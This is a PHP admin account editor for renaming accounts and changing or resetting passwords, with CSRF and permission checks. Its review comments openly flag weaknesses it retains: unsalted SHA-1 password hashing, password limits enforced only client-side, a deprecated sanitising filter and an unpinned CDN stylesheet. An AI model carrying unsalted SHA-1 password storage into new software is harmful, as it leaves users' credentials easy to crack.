Viewing: update_profile.php
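<?php

/**
 * Admin account editor.
 *
 * A signed-in admin can change their own user name and, after supplying the
 * current password, their own password. When `?id=` names a different admin,
 * the caller's role must hold the 'admin_accounts' permission; that path can
 * rename the target and reset its password without knowing the old one.
 *
 * Security notes for maintainers:
 *  - Passwords are stored and compared as unsalted SHA-1 hex digests. That
 *    format is kept here only because the login code that reads the same
 *    column is not part of this file; moving to password_hash() /
 *    password_verify() has to be done together with that code.
 *  - Every state-changing POST must carry the per-session anti-CSRF token that
 *    the form below embeds. Without it, a page on another origin could make a
 *    privileged admin's browser submit the password-reset branch.
 *  - $conn and the role helpers come from the two included components, which
 *    are not shown here; $conn is used as a PDO handle.
 */

include '../components/connect.php';
require_once '../components/admin_roles.php';

session_start();

$admin_id = $_SESSION['admin_id'] ?? null;

if (!$admin_id) {
    header('location:admin_login.php');
    exit();
}

ensureAdminRolesSchema($conn);
$currentRole = getRoleBySession($conn);

// Per-session anti-CSRF token, created on first use and checked on every POST.
if (empty($_SESSION['update_profile_csrf']) || !is_string($_SESSION['update_profile_csrf'])) {
    $_SESSION['update_profile_csrf'] = bin2hex(random_bytes(32));
}
$profile_csrf_token = $_SESSION['update_profile_csrf'];

// Without ?id= the admin edits their own account.
$target_id = isset($_GET['id']) ? (int)$_GET['id'] : (int)$admin_id;

if ($target_id <= 0) {
    addAdminFlashMessage('Selecciona un usuario válido.');
    header('location:admin_accounts.php');
    exit();
}

$editing_self = ($target_id === (int)$admin_id);

if (!$editing_self && !adminHasPermission($currentRole, 'admin_accounts')) {
    enforceAdminPermission('admin_accounts');
    // enforceAdminPermission() lives in admin_roles.php (not shown). Stop here
    // regardless, so a helper that returns instead of terminating cannot let an
    // unauthorised request fall through to the update code below.
    exit();
}

$select_target = $conn->prepare("SELECT id, name, password FROM `admin` WHERE id = ? LIMIT 1");
$select_target->execute([$target_id]);
$target_account = $select_target->fetch(PDO::FETCH_ASSOC);

if (!$target_account) {
    addAdminFlashMessage('El usuario seleccionado no existe.');
    header('location:admin_accounts.php');
    exit();
}

$current_name = $target_account['name'];
$prev_pass = $target_account['password'];
$messages = [];

if (isset($_POST['submit'])) {
    $profile_posted_token = $_POST['csrf_token'] ?? '';

    if (!is_string($profile_posted_token) || !hash_equals($profile_csrf_token, $profile_posted_token)) {
        // Reject the whole submission: neither the rename nor the password
        // branches may run for a request that did not come from this form.
        $messages[] = 'Solicitud no válida. Recarga la página e inténtalo de nuevo.';
    } else {
        // Treat non-string fields (e.g. name[]=x) as empty instead of letting
        // trim()/sha1() fail on an array.
        $name = $_POST['name'] ?? '';
        $name = is_string($name) ? trim($name) : '';
        // NOTE(review): FILTER_SANITIZE_STRING is deprecated since PHP 8.1 and
        // HTML-encodes quotes before storage. Output below is already escaped
        // with htmlspecialchars(), so this filter is a candidate for removal,
        // but only together with whatever other code reads/writes admin.name.
        $name = filter_var($name, FILTER_SANITIZE_STRING);

        if ($name !== '') {
            if ($name !== $current_name) {
                $select_name = $conn->prepare("SELECT id FROM `admin` WHERE name = ? AND id != ? LIMIT 1");
                $select_name->execute([$name, $target_id]);

                if ($select_name->rowCount() > 0) {
                    $messages[] = 'El nombre de usuario ya está en uso.';
                } else {
                    $update_name = $conn->prepare("UPDATE `admin` SET name = ? WHERE id = ?");
                    $update_name->execute([$name, $target_id]);
                    $current_name = $name;
                    $messages[] = 'Nombre actualizado con éxito!';
                }
            }
        }

        // sha1('') — used to detect an empty new password after hashing.
        $empty_hash = 'da39a3ee5e6b4b0d3255bfef95601890afd80709';

        $old_pass_raw = $_POST['old_pass'] ?? '';
        $new_pass_raw = $_POST['new_pass'] ?? '';
        $confirm_pass_raw = $_POST['confirm_pass'] ?? '';
        $old_pass_raw = is_string($old_pass_raw) ? $old_pass_raw : '';
        $new_pass_raw = is_string($new_pass_raw) ? $new_pass_raw : '';
        $confirm_pass_raw = is_string($confirm_pass_raw) ? $confirm_pass_raw : '';

        // NOTE(review): unsalted SHA-1 is not a password hash; see file header.
        // The 20-character limit and whitespace stripping exist only in the
        // browser (maxlength / oninput) and are not enforced here.
        $old_pass = sha1($old_pass_raw);
        $new_pass = sha1($new_pass_raw);
        $confirm_pass = sha1($confirm_pass_raw);

        $new_pass_provided = $new_pass_raw !== '' || $confirm_pass_raw !== '';

        if ($editing_self) {
            // Changing one's own password requires proving knowledge of the
            // current one; nothing happens unless old_pass was filled in.
            if ($old_pass_raw !== '') {
                // hash_equals() keeps the comparison constant-time.
                if (!hash_equals((string)$prev_pass, $old_pass)) {
                    $messages[] = 'Contraseña antigua no coincide!';
                } elseif ($new_pass !== $confirm_pass) {
                    $messages[] = 'Confirmar contraseña no coincide!';
                } elseif ($new_pass === $empty_hash) {
                    $messages[] = 'Por favor ingrese nueva contraseña!';
                } else {
                    $update_pass = $conn->prepare("UPDATE `admin` SET password = ? WHERE id = ?");
                    $update_pass->execute([$confirm_pass, $target_id]);
                    $prev_pass = $confirm_pass;
                    $messages[] = 'Actualización de contraseña con éxito!';
                }
            }
        } else {
            // Privileged reset of another admin's password: no old password is
            // asked for, so the permission check above and the CSRF check are
            // the only gates on this branch.
            if ($new_pass_provided) {
                if ($new_pass_raw === '' || $confirm_pass_raw === '') {
                    $messages[] = 'Ingresa y confirma la nueva contraseña.';
                } elseif ($new_pass !== $confirm_pass) {
                    $messages[] = 'Confirmar contraseña no coincide!';
                } elseif ($new_pass === $empty_hash) {
                    $messages[] = 'Por favor ingrese una contraseña válida!';
                } else {
                    $update_pass = $conn->prepare("UPDATE `admin` SET password = ? WHERE id = ?");
                    $update_pass->execute([$confirm_pass, $target_id]);
                    $messages[] = 'Contraseña restablecida con éxito!';
                }
            }
        }
    }

    if (empty($messages)) {
        $messages[] = 'No se realizaron cambios.';
    }
}

?>

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Actualizar Usuario</title>
   <link rel="icon" href="../images/favicon.png" type="image/x-icon">

   <?php /* NOTE(review): third-party stylesheet loaded without Subresource Integrity;
            add integrity/crossorigin attributes for the pinned version or self-host it. */ ?>
   <!-- font awesome cdn link -->
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">

   <!-- custom css file link -->
   <link rel="stylesheet" href="../css/admin_style.css">
</head>
<body>

<?php include '../components/admin_header.php' ?>

<!-- admin profile update section starts -->

<section class="form-container">

   <form action="" method="POST">
      <?php /* Anti-CSRF token; verified with hash_equals() before any update runs. */ ?>
      <input type="hidden" name="csrf_token" value="<?= htmlspecialchars($profile_csrf_token); ?>">
      <h3><?= $editing_self ? 'Actualizar mi usuario' : 'Actualizar usuario: ' . htmlspecialchars($current_name); ?></h3>
      <?php if(!empty($messages)): ?>
         <?php foreach($messages as $notif): ?>
            <p class="message-inline"><?= htmlspecialchars($notif); ?></p>
         <?php endforeach; ?>
      <?php endif; ?>
      <input type="text" name="name" maxlength="20" class="box" oninput="this.value = this.value.replace(/\s/g, '')" value="<?= htmlspecialchars($current_name); ?>" placeholder="Nombre de usuario">
      <?php if($editing_self): ?>
         <input type="password" name="old_pass" maxlength="20" placeholder="Ingrese su contraseña antigua" class="box" oninput="this.value = this.value.replace(/\s/g, '')">
      <?php endif; ?>
      <input type="password" name="new_pass" maxlength="20" placeholder="<?= $editing_self ? 'Ingrese su nueva contraseña' : 'Nueva contraseña (opcional)'; ?>" class="box" oninput="this.value = this.value.replace(/\s/g, '')">
      <input type="password" name="confirm_pass" maxlength="20" placeholder="Confirme la nueva contraseña" class="box" oninput="this.value = this.value.replace(/\s/g, '')">
      <input type="submit" value="Actualizar" name="submit" class="btn">
   </form>

</section>

<!-- admin profile update section ends -->

<!-- custom js file link -->
<script src="../js/admin_script.js"></script>

</body>
</html>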